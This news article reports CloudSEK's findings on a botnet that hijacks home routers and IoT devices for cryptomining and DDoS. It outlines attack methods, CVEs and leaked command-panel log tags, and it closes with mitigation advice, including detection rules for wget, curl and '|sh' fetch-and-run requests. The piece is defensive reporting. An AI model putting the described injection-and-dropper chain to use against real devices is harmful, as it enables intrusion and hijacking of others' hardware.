Is Your Router Performing Worse? Check It — Millions of Devices Are Already Mining Cryptocurrency for Hackers
This scheme is active right now—in millions of apartments around the world.
Researchers from CloudSEK have reported a large-scale campaign using a Loader-as-a-Service botnet that, over the past six months, has turned home routers and IoT devices into farms for mining and Mirai-like attacks. An analysis of leaked command server logs made it possible to trace the full attack chain—from hacking admin panels to installing multi-architecture binaries and the subsequent use of compromised devices.
The attackers use a combination of methods: passing unsanitized POST parameters (in fields like ntp, syslog, hostname), brute-forcing default passwords, and exploiting vulnerabilities in corporate and CMS systems. Targets included Oracle WebLogic, WordPress, and vBulletin, for which known bugs were used, including CVE-2019-17574, CVE-2019-16759, and CVE-2012-1823. In the corporate segment, attempts were recorded to exploit WebLogic deserialization, Struts2 OGNL injections, and JNDI exploits.
According to CloudSEK, attack intensity increased by 230% in July and August 2025. Multi-architecture executable files from the "Morte" family and JSON-RPC miners, as well as bots with Mirai functionality, were downloaded onto infected devices. Their resources were subsequently used for DDoS campaigns, covert mining, and reselling access.
The exposure of the command panel logs revealed the operators' systematic approach. The [ReplyPageLogin] blocks recorded credential brute-forcing attempts; [ConfigSystemCommand] and [SystemCommand] contained commands for downloading droppers via wget, busybox, and TFTP/FTP chains. The [ReplyErrorPage] and [ReplySuccessPage] tags helped track successful execution or errors, while [ReplyDeviceInfo] collected information about firmware, MAC addresses, and available services. This allowed them to select the most suitable payload package for each device.
The investigation revealed that the primary attack focus was on SOHO routers with vulnerable interfaces like wlwps.htm and wan_dyna.html, as well as on embedded Linux systems, where binary builds like morte.x86 and morte.x86_64 were uploaded. An additional risk is created by the use of HTTP, FTP, and TFTP protocols for payload delivery, making the botnet resilient and flexible.
The campaign's impact is assessed as multi-faceted. For businesses, this poses a risk of data theft, lateral movement within the network, and the spread of secondary threats, including ransomware. For corporate routers, threats include channel overload, time spoofing via NTP, and DNS manipulation.
Small businesses and providers are facing a situation where their infrastructure is turned into a springboard for attacks on larger targets. As a result, organizations are experiencing degraded network performance, increased load on response teams, and the need for constant monitoring of new attack vectors.
CloudSEK advises implementing multi-layered protection: block outgoing HTTP, HTTPS, FTP, and TFTP traffic for IoT segments; isolate devices showing signs of POST parameter tampering; update firmware and passwords; and disable remote administration.
For SOC and SIEM, it is recommended to configure rules for detecting suspicious requests, including the use of wget, curl, or calls via |sh, as well as to monitor anomalous JSON-RPC connections. During incident response, it is necessary to isolate infected devices, collect artifacts like logs and the contents of /tmp, and if an update is not possible, completely re-flash or replace the equipment.
The company predicts the further development of this infrastructure with an expansion of the list of targeted devices and increased complexity of malicious modules. In their assessment, only systematic control and prompt response can mitigate the risks from this new model of a service-based botnet.
